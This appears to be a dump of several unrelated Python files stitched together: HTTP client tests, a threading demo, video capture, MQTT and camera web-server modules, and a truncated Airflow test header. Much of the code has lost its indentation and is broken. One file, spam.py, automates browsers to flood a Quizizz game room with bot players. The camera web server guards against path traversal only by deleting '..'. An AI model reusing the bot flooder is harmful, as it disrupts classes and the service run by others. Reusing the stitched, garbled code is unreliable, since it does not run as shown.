http = httpclass.HTTPClient()
urls = [
"http://www.cs.ualberta.ca/",
"http://softwareprocess.es/static/SoftwareProcess.es.html",
"http://c2.com/cgi/wiki?CommonLispHyperSpec",
"http://slashdot.org"
]
for url in urls:
try:
req = http.GET( url )
except Exception as e:
print("An Exception was thrown for %s" % url)
self.assertTrue( False, "An Exception was thrown for %s %s" % (url,e))
self.assertTrue(req != None, "None Returned! %s" % url)
self.assertTrue(req.code == 200 or
req.code == 301 or
req.code == 302,
"Code: %s for %s" % (req.code, url))
if (req.code == 200):
self.assertTrue(req.body.find("DOCTYPE")>=0 or
req.body.find("<body")>=0 ,
"%s Data: [%s] " % (url,req.body))
def testPOST(self):
'''Test HTTP POST with an echo server'''
MyHTTPHandler.post = echo_post
http = httpclass.HTTPClient()
path = "post_echoer"
url = "http://%s:%d/%s" % (BASEHOST,BASEPORT, path)
args = {'a':'aaaaaaaaaaaaa',
'b':'bbbbbbbbbbbbbbbbbbbbbb',
'c':'c',
'd':'012345\r67890\n2321321\n\r'}
print("Sending POST!")
req = http.POST( url, args=args )
self.assertTrue(req != None, "None Returned!")
self.assertTrue(req.code == 200)
print("Test Post Body: [%s]" % req.body)
outargs = json.loads(req.body)
print(outargs.__class__)
for key in args:
self.assertTrue(args[key] == outargs[key][0], "Key [%s] not found" % key)
for key in outargs:
self.assertTrue(args[key] == outargs[key][0], "Key [%s] not found" % key)
@classmethod
def tearDownClass(self):
if (TestHTTPClient.httpd!=None):
print("HTTP Shutdown in tearDown\n")
TestHTTPClient.httpd.shutdown()
TestHTTPClient.httpd.server_close()
time.sleep(1)
def test_test_webserver():
print("http://%s:%d/dsadsadsadsa\n" % (BASEHOST,BASEPORT) )
MyHTTPHandler.get = echo_path_get
MyHTTPHandler.post = echo_post
httpd = make_http_server()
try:
httpd.serve_forever()
finally:
httpd.shutdown()
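# --- Hedged sketch (not the assignment's socket-based solution): a stdlib stand-in
# --- that exposes the interface the tests above exercise, i.e. HTTPClient().GET(url)
# --- and .POST(url, args=...) returning an object with .code and .body. It delegates
# --- to urllib, so it only illustrates the expected shape of the httpclient module.
import urllib.request
import urllib.error


class _HTTPResponseStub:
    def __init__(self, code, body):
        self.code = code
        self.body = body


class _HTTPClientSketch:
    def GET(self, url, args=None):
        return self._request(url)

    def POST(self, url, args=None):
        data = urllib.parse.urlencode(args or {}).encode("utf-8")
        return self._request(url, data=data)

    def _request(self, url, data=None):
        try:
            # Note: urllib follows redirects, so 301/302 responses come back as 200
            with urllib.request.urlopen(url, data=data) as resp:
                return _HTTPResponseStub(resp.getcode(), resp.read().decode("utf-8"))
        except urllib.error.HTTPError as e:
            return _HTTPResponseStub(e.code, e.read().decode("utf-8"))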
if __name__ == '__main__':
unittest.main()
|
threading_demo.py
|
import threading
from time import sleep
def install_wordpress(customer):
"""code to mimic some heavy work"""
print(f"Start installation for {customer}")
sleep(3)
print(f"All done for {customer}")
def developers_day(customers):
    """Use threading; a lock ensures the worker threads don't conflict over the shared customer list."""
lock = threading.Lock()
def dev_day(id):
        print(f"Good morning from developer {id}")
# let's lock
lock.acquire()
while customers:
customer = customers.pop(0)
lock.release()
# do the work
install_wordpress(customer)
lock.acquire()
lock.release()
print(f"Bye from developer {id}")
devs = [threading.Thread(target=dev_day, args=(i, )) for i in range(5)]
# start in morning
[dev.start() for dev in devs]
# end for evening
[dev.join() for dev in devs]
developers_day(["Customer %d" % i for i in range(5)])
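# --- Hedged sketch (not part of the original demo): the same workflow expressed
# --- with concurrent.futures.ThreadPoolExecutor and a thread-safe queue.Queue,
# --- so no manual lock handling is needed. The function and variable names
# --- below are illustrative only.
from concurrent.futures import ThreadPoolExecutor
from queue import Queue, Empty


def developers_day_pooled(customers, workers=5):
    """Install WordPress for every customer using a pool of worker threads."""
    jobs = Queue()
    for customer in customers:
        jobs.put(customer)

    def dev_day_pooled(dev_id):
        print(f"Good morning from developer {dev_id}")
        while True:
            try:
                # Queue.get_nowait() is thread-safe, so no explicit lock is required
                customer = jobs.get_nowait()
            except Empty:
                break
            install_wordpress(customer)
            jobs.task_done()
        print(f"Bye from developer {dev_id}")

    with ThreadPoolExecutor(max_workers=workers) as pool:
        for i in range(workers):
            pool.submit(dev_day_pooled, i)


# Uncomment to run the pooled variant as well:
# developers_day_pooled(["Customer %d" % i for i in range(5)])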
|
spam.py
|
import os
import secrets
import threading
import time
from concurrent.futures import ThreadPoolExecutor
from colorama import Fore, init
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.firefox.options import Options as FirefoxOptions
init(autoreset=True)
URL = 'https://quizizz.com/join'
def spam(code, number_of_bots, headless):
if headless:
options = webdriver.FirefoxOptions()
options.headless = True
driver = webdriver.Firefox(options=options)
else:
driver = webdriver.Firefox()
for i in range(number_of_bots):
driver.switch_to.window(driver.window_handles[i])
driver.get(URL)
while True:
try:
code_input = driver.find_element_by_class_name('check-room-input')
code_input.send_keys(code)
time.sleep(0.05)
code_input.send_keys(Keys.RETURN)
break
            except Exception:
time.sleep(0.25)
while True:
try:
name_input = driver.find_element_by_class_name('enter-name-field')
name_input.clear()
time.sleep(0.1)
name_input.send_keys(secrets.token_hex(4))
time.sleep(0.05)
name_input.send_keys(Keys.RETURN)
break
            except Exception:
time.sleep(0.25)
driver.execute_script(f'''window.open("{URL}","_blank");''')
time.sleep(0.1)
if __name__ == '__main__':
try:
code = input(f'Enter code: {Fore.GREEN}')
print(Fore.RESET)
number_of_bots = int(input(f'Enter the number of bots to join: {Fore.GREEN}'))
print(Fore.RESET)
number_of_threads = int(input(f'Enter the number of threads to use: {Fore.GREEN}'))
print(Fore.RESET)
start_time = time.perf_counter()
threads = []
for i in range(number_of_threads):
t = threading.Thread(target=spam, args=(code, (number_of_bots // number_of_threads), False,))
threads.append(t)
t.start()
for idx, thread in enumerate(threads):
thread.join()
print(f'Time taken for {number_of_bots}: {time.perf_counter() - start_time}')
except KeyboardInterrupt:
print(f'{Fore.RESET}Quitting')
os.system('taskkill /F /IM firefox.exe')
print('\nClosed all instances of firefox.exe')
|
videoio.py
|
from pathlib import Path
from enum import Enum
from collections import deque
import subprocess
import threading
import logging
import cv2
class Protocol(Enum):
FILE = 0
CSI = 1
V4L2 = 2
RTSP = 3
class VideoIO:
"""
Class for video capturing from video files or cameras, and writing video files.
Encoding and decoding are accelerated using the GStreamer backend.
Parameters
----------
size : (int, int)
Width and height of each frame.
config : Dict
Camera configuration.
input_uri : string
URI to an input video file or capturing device.
output_uri : string
URI to an output video file.
latency : float
Approximate video processing latency.
"""
def __init__(self, size, config, input_uri, output_uri=None, latency=1/30):
self.size = size
self.input_uri = input_uri
self.output_uri = output_uri
self.camera_size = config['camera_size']
self.camera_fps = config['camera_fps']
self.buffer_size = config['buffer_size']
self.protocol = self._parse_uri(self.input_uri)
self.cap = cv2.VideoCapture(self._gst_cap_pipeline(), cv2.CAP_GSTREAMER)
self.frame_queue = deque([], maxlen=self.buffer_size)
self.cond = threading.Condition()
self.exit_event = threading.Event()
self.capture_thread = threading.Thread(target=self._capture_frames)
ret, frame = self.cap.read()
if not ret:
raise RuntimeError('Unable to read video stream')
self.frame_queue.append(frame)
self.fps = self.cap.get(cv2.CAP_PROP_FPS)
if self.fps == 0:
self.fps = self.camera_fps # fallback
self.capture_dt = 1 / self.fps
logging.info('%dx%d stream @ %d FPS', *self.size, self.fps)
output_fps = self.fps
if self.protocol != Protocol.FILE:
# limit capture interval at processing latency
self.capture_dt = max(self.capture_dt, latency)
output_fps = 1 / self.capture_dt
if self.output_uri is not None:
Path(self.output_uri).parent.mkdir(parents=True, exist_ok=True)
self.writer = cv2.VideoWriter(self._gst_write_pipeline(), 0, output_fps,
self.size, True)
def start_capture(self):
"""
Start capturing from video file or device.
"""
if not self.cap.isOpened():
self.cap.open(self._gst_cap_pipeline(), cv2.CAP_GSTREAMER)
if not self.capture_thread.is_alive():
self.capture_thread.start()
def stop_capture(self):
"""
Stop capturing from video file or device.
"""
with self.cond:
self.exit_event.set()
self.cond.notify()
self.frame_queue.clear()
self.capture_thread.join()
def read(self):
"""
Returns the next video frame.
Returns None if there are no more frames.
"""
with self.cond:
while len(self.frame_queue) == 0 and not self.exit_event.is_set():
self.cond.wait()
if len(self.frame_queue) == 0 and self.exit_event.is_set():
return None
frame = self.frame_queue.popleft()
self.cond.notify()
return frame
def write(self, frame):
"""
Writes the next video frame.
"""
assert hasattr(self, 'writer')
self.writer.write(frame)
def release(self):
"""
Closes video file or capturing device.
"""
self.stop_capture()
if hasattr(self, 'writer'):
self.writer.release()
self.cap.release()
def _gst_cap_pipeline(self):
gst_elements = str(subprocess.check_output('gst-inspect-1.0'))
if 'nvvidconv' in gst_elements and self.protocol != Protocol.V4L2:
# format conversion for hardware decoder
cvt_pipeline = (
'nvvidconv ! '
'video/x-raw, width=(int)%d, height=(int)%d, format=(string)BGRx !'
'videoconvert ! appsink'
% self.size
)
else:
cvt_pipeline = (
'videoscale ! '
'video/x-raw, width=(int)%d, height=(int)%d !'
'videoconvert ! appsink'
% self.size
)
if self.protocol == Protocol.FILE:
pipeline = 'filesrc location=%s ! decodebin ! ' % self.input_uri
elif self.protocol == Protocol.CSI:
if 'nvarguscamerasrc' in gst_elements:
pipeline = (
'nvarguscamerasrc sensor_id=%s ! '
'video/x-raw(memory:NVMM), width=(int)%d, height=(int)%d, '
'format=(string)NV12, framerate=(fraction)%d/1 ! '
% (
self.input_uri[6:],
*self.camera_size,
self.camera_fps
)
)
else:
raise RuntimeError('GStreamer CSI plugin not found')
elif self.protocol == Protocol.V4L2:
if 'v4l2src' in gst_elements:
pipeline = (
'v4l2src device=%s ! '
'video/x-raw, width=(int)%d, height=(int)%d, '
'format=(string)YUY2, framerate=(fraction)%d/1 ! '
% (
self.input_uri,
*self.camera_size,
self.camera_fps
)
)
else:
raise RuntimeError('GStreamer V4L2 plugin not found')
elif self.protocol == Protocol.RTSP:
pipeline = 'rtspsrc location=%s latency=0 ! decodebin ! ' % self.input_uri
return pipeline + cvt_pipeline
def _gst_write_pipeline(self):
gst_elements = str(subprocess.check_output('gst-inspect-1.0'))
# use hardware encoder if found
if 'omxh264enc' in gst_elements:
h264_encoder = 'omxh264enc'
elif 'avenc_h264_omx' in gst_elements:
h264_encoder = 'avenc_h264_omx'
elif 'x264enc' in gst_elements:
h264_encoder = 'x264enc'
else:
raise RuntimeError('GStreamer H.264 encoder not found')
pipeline = (
'appsrc ! autovideoconvert ! %s ! qtmux ! filesink location=%s '
% (
h264_encoder,
self.output_uri
)
)
return pipeline
def _capture_frames(self):
while not self.exit_event.is_set():
ret, frame = self.cap.read()
with self.cond:
if not ret:
self.exit_event.set()
self.cond.notify()
break
# keep unprocessed frames in the buffer for video file
if self.protocol == Protocol.FILE:
while (len(self.frame_queue) == self.buffer_size and
not self.exit_event.is_set()):
self.cond.wait()
self.frame_queue.append(frame)
self.cond.notify()
@staticmethod
def _parse_uri(uri):
pos = uri.find('://')
if '/dev/video' in uri:
protocol = Protocol.V4L2
elif uri[:pos] == 'csi':
protocol = Protocol.CSI
elif uri[:pos] == 'rtsp':
protocol = Protocol.RTSP
else:
protocol = Protocol.FILE
return protocol
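# --- Hedged usage sketch (not part of the original module). It wires VideoIO to a
# --- plain video file using the three config keys the class reads above
# --- (camera_size, camera_fps, buffer_size). The file paths and frame size are
# --- hypothetical placeholders, and a GStreamer-enabled OpenCV build is assumed.
if __name__ == '__main__':
    example_config = {
        'camera_size': (1280, 720),   # only used for CSI/V4L2 sources
        'camera_fps': 30,             # fallback FPS when the stream reports 0
        'buffer_size': 10,            # frames kept in the internal deque
    }
    stream = VideoIO(
        size=(1280, 720),
        config=example_config,
        input_uri='input.mp4',        # hypothetical input file
        output_uri='output/out.mp4',  # hypothetical output file
    )
    stream.start_capture()
    try:
        while True:
            frame = stream.read()
            if frame is None:         # no more frames
                break
            stream.write(frame)
    finally:
        stream.release()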
|
mqtt.py
|
"""Support for MQTT input/output."""
import json
import socket
import threading
import time
from collections import defaultdict
from queue import Queue
from typing import Any, Dict, List, Optional
import pydash
from rhasspy.actor import RhasspyActor
# -----------------------------------------------------------------------------
class MqttPublish:
"""Request to publish payload to topic."""
def __init__(self, topic: str, payload: bytes) -> None:
self.topic = topic
self.payload = payload
class MqttSubscribe:
"""Request to subscribe to a topic."""
def __init__(self, topic: str, receiver: Optional[RhasspyActor] = None) -> None:
self.topic = topic
self.receiver = receiver
class MqttConnected:
"""Response when connected to broker."""
pass
class MqttDisconnected:
"""Response when disconnected from broker."""
pass
class MqttMessage:
"""Response when MQTT message is received."""
def __init__(self, topic: str, payload: bytes) -> None:
self.topic = topic
self.payload = payload
class MessageReady:
"""Internal event for actor."""
pass
# -----------------------------------------------------------------------------
# Interoperability with Snips.AI Hermes protocol
# https://docs.snips.ai/ressources/hermes-protocol
# -----------------------------------------------------------------------------
class HermesMqtt(RhasspyActor):
"""Communicate with MQTT broker using Hermes protocol."""
def __init__(self) -> None:
RhasspyActor.__init__(self)
self.client = None
self.connected = False
self.subscriptions: Dict[str, List[RhasspyActor]] = defaultdict(list)
self.publications: Dict[str, List[bytes]] = defaultdict(list)
self.message_queue: Queue = Queue()
self.site_ids: List[str] = []
self.site_id = "default"
self.host = "localhost"
self.port = 1883
self.username = ""
self.password = None
self.reconnect_sec = 5
self.publish_intents = True
# -------------------------------------------------------------------------
def to_started(self, from_state: str) -> None:
"""Transition to started state."""
# Load settings
self.site_ids = self.profile.get("mqtt.site_id", "default").split(",")
if len(self.site_ids) > 0:
self.site_id = self.site_ids[0]
else:
self.site_id = "default"
self.host = self.profile.get("mqtt.host", "localhost")
self.port = int(self.profile.get("mqtt.port", 1883))
self.username = self.profile.get("mqtt.username", "")
self.password = self.profile.get("mqtt.password", None)
self.reconnect_sec = self.profile.get("mqtt.reconnect_sec", 5)
self.publish_intents = self.profile.get("mqtt.publish_intents", True)
if self.profile.get("mqtt.enabled", False):
self.transition("connecting")
def in_started(self, message: Any, sender: RhasspyActor) -> None:
"""Handle messages in started state."""
self.save_for_later(message, sender)
def to_connecting(self, from_state: str) -> None:
"""Transition to connecting state."""
import paho.mqtt.client as mqtt
self.client = mqtt.Client()
assert self.client is not None
self.client.on_connect = self.on_connect
self.client.on_message = self.on_message
self.client.on_disconnect = self.on_disconnect
if len(self.username) > 0:
self._logger.debug("Logging in as %s", self.username)
self.client.username_pw_set(self.username, self.password)
self._logger.debug("Connecting to MQTT broker %s:%s", self.host, self.port)
def do_connect():
success = False
while not success:
try:
ret = self.client.connect(self.host, self.port)
self.client.loop_start()
while (ret != 0) and (self.reconnect_sec > 0):
self._logger.warning("Connection failed: %s", ret)
self._logger.debug(
"Reconnecting in %s second(s)", self.reconnect_sec
)
time.sleep(self.reconnect_sec)
ret = self.client.connect(self.host, self.port)
success = True
except Exception:
self._logger.exception("connecting")
if self.reconnect_sec > 0:
self._logger.debug(
"Reconnecting in %s second(s)", self.reconnect_sec
)
time.sleep(self.reconnect_sec)
self._logger.debug("Connection successful.")
# Connect in a separate thread
threading.Thread(target=do_connect, daemon=True).start()
def in_connecting(self, message: Any, sender: RhasspyActor) -> None:
"""Handle messages in connecting."""
if isinstance(message, MqttConnected):
self.connected = True
self.transition("connected")
elif isinstance(message, MqttDisconnected):
if self.reconnect_sec > 0:
self._logger.debug("Reconnecting in %s second(s)", self.reconnect_sec)
time.sleep(self.reconnect_sec)
self.transition("started")
else:
self.save_for_later(message, sender)
def to_connected(self, from_state: str) -> None:
"""Transition to connected state."""
assert self.client is not None
# Subscribe to topics
for topic in self.subscriptions:
self.client.subscribe(topic)
self._logger.debug("Subscribed to %s", topic)
# Publish outstanding messages
for topic, payloads in self.publications.items():
for payload in payloads:
self.client.publish(topic, payload)
self.publications.clear()
def in_connected(self, message: Any, sender: RhasspyActor) -> None:
"""Handle messages in connected state."""
if isinstance(message, MqttDisconnected):
if self.reconnect_sec > 0:
self._logger.debug("Reconnecting in %s second(s)", self.reconnect_sec)
time.sleep(self.reconnect_sec)
self.transition("started")
else:
self.transition("connecting")
elif isinstance(message, MessageReady):
while not self.message_queue.empty():
mqtt_message = self.message_queue.get()
for receiver in self.subscriptions[mqtt_message.topic]:
self.send(receiver, mqtt_message)
elif self.connected:
from rhasspy.intent import IntentRecognized
assert self.client is not None
if isinstance(message, MqttSubscribe):
receiver = message.receiver or sender
self.subscriptions[message.topic].append(receiver)
self.client.subscribe(message.topic)
self._logger.debug("Subscribed to %s", message.topic)
elif isinstance(message, MqttPublish):
self.client.publish(message.topic, message.payload)
elif isinstance(message, IntentRecognized):
if self.publish_intents:
self.publish_intent(message.intent)
else:
self.save_for_later(message, sender)
def to_stopped(self, from_state: str) -> None:
"""Transition to stopped state."""
if self.client is not None:
self.connected = False
self._logger.debug("Stopping MQTT client")
self.client.loop_stop()
self.client = None
# -------------------------------------------------------------------------
def save_for_later(self, message: Any, sender: RhasspyActor) -> None:
"""Cache message until connected."""
if isinstance(message, MqttSubscribe):
receiver = message.receiver or sender
self.subscriptions[message.topic].append(receiver)
elif isinstance(message, MqttPublish):
self.publications[message.topic].append(message.payload)
# -------------------------------------------------------------------------
def on_connect(self, client, userdata, flags, rc):
"""Callback when connected to broker."""
try:
self._logger.info("Connected to %s:%s", self.host, self.port)
self.send(self.myAddress, MqttConnected())
except Exception:
self._logger.exception("on_connect")
    def on_disconnect(self, client, userdata, rc):
"""Callback when disconnected from broker."""
try:
self._logger.warning("Disconnected")
self.connected = False
self.send(self.myAddress, MqttDisconnected())
except Exception:
self._logger.exception("on_disconnect")
def on_message(self, client, userdata, msg):
"""Callback when message received."""
try:
self.message_queue.put(MqttMessage(msg.topic, msg.payload))
self.send(self.myAddress, MessageReady())
except Exception:
self._logger.exception("on_message")
# -------------------------------------------------------------------------
def publish_intent(self, intent: Dict[str, Any]) -> None:
"""Publish intent to MQTT using Hermes protocol."""
intent_name = pydash.get(intent, "intent.name", "")
not_recognized = len(intent_name) == 0
assert self.client is not None
if not_recognized:
# Publish using Hermes protocol
topic = "hermes/nlu/intentNotRecognized"
payload = json.dumps({"sessionId": "", "input": intent.get("text", "")})
else:
# Publish using Rhasspy protocol
topic = f"rhasspy/intent/{intent_name}"
payload = json.dumps(
{ev["entity"]: ev["value"] for ev in intent["entities"]}
)
self.client.publish(topic, payload)
# Publish using Hermes protocol
topic = f"hermes/intent/{intent_name}"
payload = json.dumps(
{
"sessionId": "",
"siteId": self.site_id,
"input": intent.get("text", ""),
"intent": {
"intentName": intent_name,
"confidenceScore": pydash.get(intent, "intent.confidence", 1),
},
"slots": [
{
"slotName": ev["entity"],
"confidence": 1,
"value": {"kind": ev["entity"], "value": ev["value"]},
"rawValue": ev["value"],
}
for ev in intent.get("entities", [])
],
}
).encode()
self.client.publish(topic, payload)
self._logger.debug("Published intent to %s", topic)
# -------------------------------------------------------------------------
def get_problems(self) -> Dict[str, Any]:
"""Get problems on startup."""
problems: Dict[str, Any] = {}
s = socket.socket()
try:
s.connect((self.host, self.port))
except Exception:
problems[
"Can't connect to server"
] = f"Unable to connect to your MQTT server at {self.host}:{self.port}. Is it running?"
finally:
s.close()
return problems
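# --- Hedged sketch (not part of the original module): the shape of the Hermes
# --- intent payload that publish_intent() builds above, rendered for a
# --- hypothetical recognised intent. It only prints the topic and JSON body;
# --- no MQTT broker or actor system is required.
if __name__ == "__main__":
    example_intent = {
        "text": "turn on the kitchen light",
        "intent": {"name": "ChangeLightState", "confidence": 0.92},
        "entities": [{"entity": "state", "value": "on"}],
    }
    example_name = example_intent["intent"]["name"]
    example_topic = f"hermes/intent/{example_name}"
    example_payload = {
        "sessionId": "",
        "siteId": "default",
        "input": example_intent["text"],
        "intent": {
            "intentName": example_name,
            "confidenceScore": example_intent["intent"]["confidence"],
        },
        "slots": [
            {
                "slotName": ev["entity"],
                "confidence": 1,
                "value": {"kind": ev["entity"], "value": ev["value"]},
                "rawValue": ev["value"],
            }
            for ev in example_intent["entities"]
        ],
    }
    print(example_topic)
    print(json.dumps(example_payload, indent=2))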
|
STWebServer.py
|
#Copyright (C) 2021 Andrew Palardy
#See LICENSE file for complete license terms
#WebServer class
#This file manages the web interface and web api endpoints
import cv2
import numpy as np
from datetime import datetime
import json
import random
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
import os.path
import logging
#Web Server class
class STWebServer():
def __init__(self,WebConfig,Objs):
#Store objects for use in the handler
self.Objs = Objs
print("WEB: Config is ",WebConfig)
#Get configuration fields
self.Host = WebConfig.get('host','')
self.Port = WebConfig.get('port',8080)
#Start webserver task
self.Task = threading.Thread(target=self.task,name="Webserver")
self.Task.start()
#Separate thread to run webserver
def task(self):
#Store server so it can be used by request handler
server = self
#Request Handling class
class STWebServerHandler(BaseHTTPRequestHandler):
def do_GET(self):
print("Path is",self.path)
#If the request starts with API, call the api endpoint
if(self.path.startswith('/api/')):
#Strip prefix
self.path = self.path.replace("/api/","")
self.do_api()
#Otherwise, it must be a static element, so call the static handler
else:
self.do_static()
#Function to return a string result
def return_string(self,data):
self.wfile.write(bytes(data,"utf-8"))
return
#Function to return the index page
def do_index(self):
self.send_response(200)
self.send_header("Content-type", "text/html")
self.end_headers()
self.wfile.write(bytes("<html><head><title>https://pythonbasics.org</title></head>", "utf-8"))
self.wfile.write(bytes("<p>Request: %s</p>" % self.path, "utf-8"))
self.wfile.write(bytes("<body>", "utf-8"))
self.wfile.write(bytes("<p>This is an example web server.</p>", "utf-8"))
self.wfile.write(bytes("<table>","utf-8"))
#Print information about each camera
for camera in server.Objs['CamCd']:
self.wfile.write(bytes("<h2>"+camera.Name+"</h2>","utf-8"))
self.wfile.write(bytes("<p>Status:<br>"+json.dumps(camera.CStatus)+"</p>","utf-8"))
#self.wfile.write(bytes("<table>","utf-8"))
#self.wfile.write(bytes("<tr>"+json.dumps(server.Objs)+"</p","utf-8"))
#self.wfile.write(bytes("</table>","utf-8"))
self.wfile.write(bytes("</body></html>", "utf-8"))
#Function to return a static file
def do_static(self):
#Strip the path of all ..'s so people don't try and escape
self.path = self.path.replace("..","")
                #Add the path of the current file + 'static'
root = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'static')
                #If the path is the root, serve the index file
if self.path == '/':
filename = root + '/index.html'
else:
filename = root + self.path
#Determine if file does or does not exist
if(not os.path.exists(filename)):
#Return an error
self.do_error()
return
#Determine file type
self.send_response(200)
if filename.endswith('.css'):
self.send_header('Content-type', 'text/css')
elif filename.endswith('.json'):
self.send_header('Content-type', 'application/json')
elif filename.endswith('.js'):
self.send_header('Content-type', 'application/javascript')
elif filename.endswith('.ico'):
self.send_header('Content-type', 'image/x-icon')
elif filename.endswith('.png'):
self.send_header('Content-type', 'image/png')
else:
self.send_header('Content-type', 'text/html')
self.end_headers()
#Open file as binary and return as binary
with open(filename, 'rb') as fh:
data = fh.read()
self.wfile.write(data)
#Function to return an API endpoint
def do_api(self):
#Camera endpoint (single camera detection status)
if(self.path.startswith('camera/')):
self.do_api_camera()
#Camera Still endpoint
elif(self.path.startswith('camerastill/')):
self.do_api_camerastill()
#Cameras endpoint (array of camera statuses)
elif(self.path.startswith('cameras')):
self.do_api_cameras()
#Box List endpoint
elif(self.path.startswith('boxes')):
self.do_api_boxes()
#Other
else:
self.do_error()
#Function to return an error in HTML form
def do_error(self):
self.send_response(404)
self.send_header("Content-type", "text/html")
self.end_headers()
self.return_string("<html><body>Not Found</body></html>")
#Function to handle the cameras endpoint (array of camera statuses)
def do_api_cameras(self):
self.send_response(200)
self.send_header('Content-type','application/json')
self.end_headers()
RtnData = []
for Cam in server.Objs['CamCd']:
RtnData.append(Cam.CStatus)
#JSON-ify the result
self.return_string(json.dumps(RtnData))
#Function to handle the camera endpoint (array of detections for one camera)
def do_api_camera(self):
#Strip the API endpoint so we can identify the camera name
self.path = self.path.replace('camera/','')
print("WEB: Identifying camera by name",self.path)
#Check which camera it is
RtnData = None
for Cam in server.Objs['CamCd']:
if self.path.startswith(Cam.Name):
#Camera is valid, but results are not
if Cam.Results is None:
                            RtnData = {'Length':0}
#Results are valid
else:
RtnData = {'Length':len(Cam.Results),'Results':Cam.Results}
#If none, path wasn't found
if RtnData is None:
self.do_error()
return
#Otherwise, JSON-ify it
self.send_response(200)
self.send_header('Content-type','application/json')
self.end_headers()
self.return_string(json.dumps(RtnData))
#Function to return a JPEG of the latest image from a camera
def do_api_camerastill(self):
#Strip the API endpoint so we can identify the camera name
self.path = self.path.replace('camerastill/','')
print("WEB: Identifying camera by name for still",self.path)
#Check which camera it is
RtnData = None
ImgFound = False
for Cam in server.Objs['CamCd']:
if self.path.startswith(Cam.Name):
#Camera is correct
ImgFound = True
#Camera is correct and image is valid, convert image to bytes
if Cam.ImageColor is not None:
ImSuccess,RtnData = cv2.imencode(".jpeg",Cam.ImageColor)
if not ImSuccess:
RtnData = None
#If ImgFound is false, return error
if ImgFound == False:
self.do_error()
return
#If RtnData is none, then the image was found to be invalid
elif RtnData is None:
#Return 503 error if camera is offline
self.send_response(503)
self.end_headers()
return
#Otherwise, return binary data
self.send_response(200)
self.send_header('Content-type','image/jpeg')
self.end_headers()
self.wfile.write(RtnData.tobytes())
            #Custom log_message override that does nothing, so every request is not logged
def log_message(self, format, *args):
return
print("WEB: Starting task")
#Create server
self.Server = HTTPServer((self.Host,self.Port),STWebServerHandler)
#Run forever
self.Server.serve_forever()
#Finished running the webserver
print("WEB: Stopped webserver")
#Stop the webserver
def stop(self):
self.Server.server_close()
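# --- Hedged client-side sketch (not part of the original module) showing how the
# --- /api/ endpoints handled in do_api() above can be queried. The host, port and
# --- camera name are hypothetical, and a running STWebServer instance is assumed.
if __name__ == '__main__':
    import urllib.request
    base = 'http://localhost:8080'    # matches the default port configured above
    # Array of camera statuses
    with urllib.request.urlopen(base + '/api/cameras') as resp:
        print(json.loads(resp.read()))
    # Detections for a single (hypothetical) camera called 'FrontDoor'
    with urllib.request.urlopen(base + '/api/camera/FrontDoor') as resp:
        print(json.loads(resp.read()))
    # Latest JPEG still from the same camera, saved to disk
    with urllib.request.urlopen(base + '/api/camerastill/FrontDoor') as resp:
        with open('FrontDoor.jpg', 'wb') as fh:
            fh.write(resp.read())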
|
test_utils.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
# Sources:
# * https://github.com/apache/airflow/blob/ffb472cf9e630bd70f51b74b0d0ea4ab98635572/airflow/cli/commands/task_command.py
# * https://github.com/apache/airflow/blob/master/docs/apache-airflow/best-practices.rst
# Copyright (c) 2011-2017 Ruslan Spivak
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
# Sources:
# * https://github.com/rspivak/sftpserver/blob/master/src/sftpserver/__init__.py
# Copyright 2021 Curtin University
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Author: James Diprose
import contextlib
import datetime
import logging
import os
import shutil
import socket
import socketserver
import threading
import time
import unittest
import uuid
from dataclasses import dataclass
from datetime import datetime, timedelta
from http.server import SimpleHTTPRequestHandler, ThreadingHTTPServer
from multiprocessing import Process
from typing import Dict, List
from unittest.mock import patch
import croniter
import google
import httpretty
import paramiko
import pendulum
import requests
from airflow import DAG, settings
from airflow.exceptions import AirflowException
from airflow.models import DagBag
from airflow.models.connection import Connection
from airflow.models.dagrun import DagRun
from airflow.models.taskinstance import TaskInstance
from airflow.models.variable import Variable
from airflow.operators.dummy_operator import DummyOperator
from airflow.utils import db
from airflow.utils.state import State
from click.testing import CliRunner
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import serialization
from cryptography.hazmat.primitives.asymmetric import rsa
from dateutil.relativedelta import relativedelta
from freezegun import freeze_time
from google.cloud import bigquery, storage
from google.cloud.exceptions import NotFound
from pendulum import DateTime
from sftpserver.stub_sftp import StubServer, StubSFTPServer
from observatory.api.testing import ObservatoryApiEnvironment
from observatory.platform.elastic.elastic_environment import ElasticEnvironment
from observatory.platform.utils.airflow_utils import AirflowVars
from observatory.platform.utils.config_utils import module_file_path
from observatory.platform.utils.file_utils import (
crc32c_base64_hash,
get_file_hash,
gzip_file_crc,
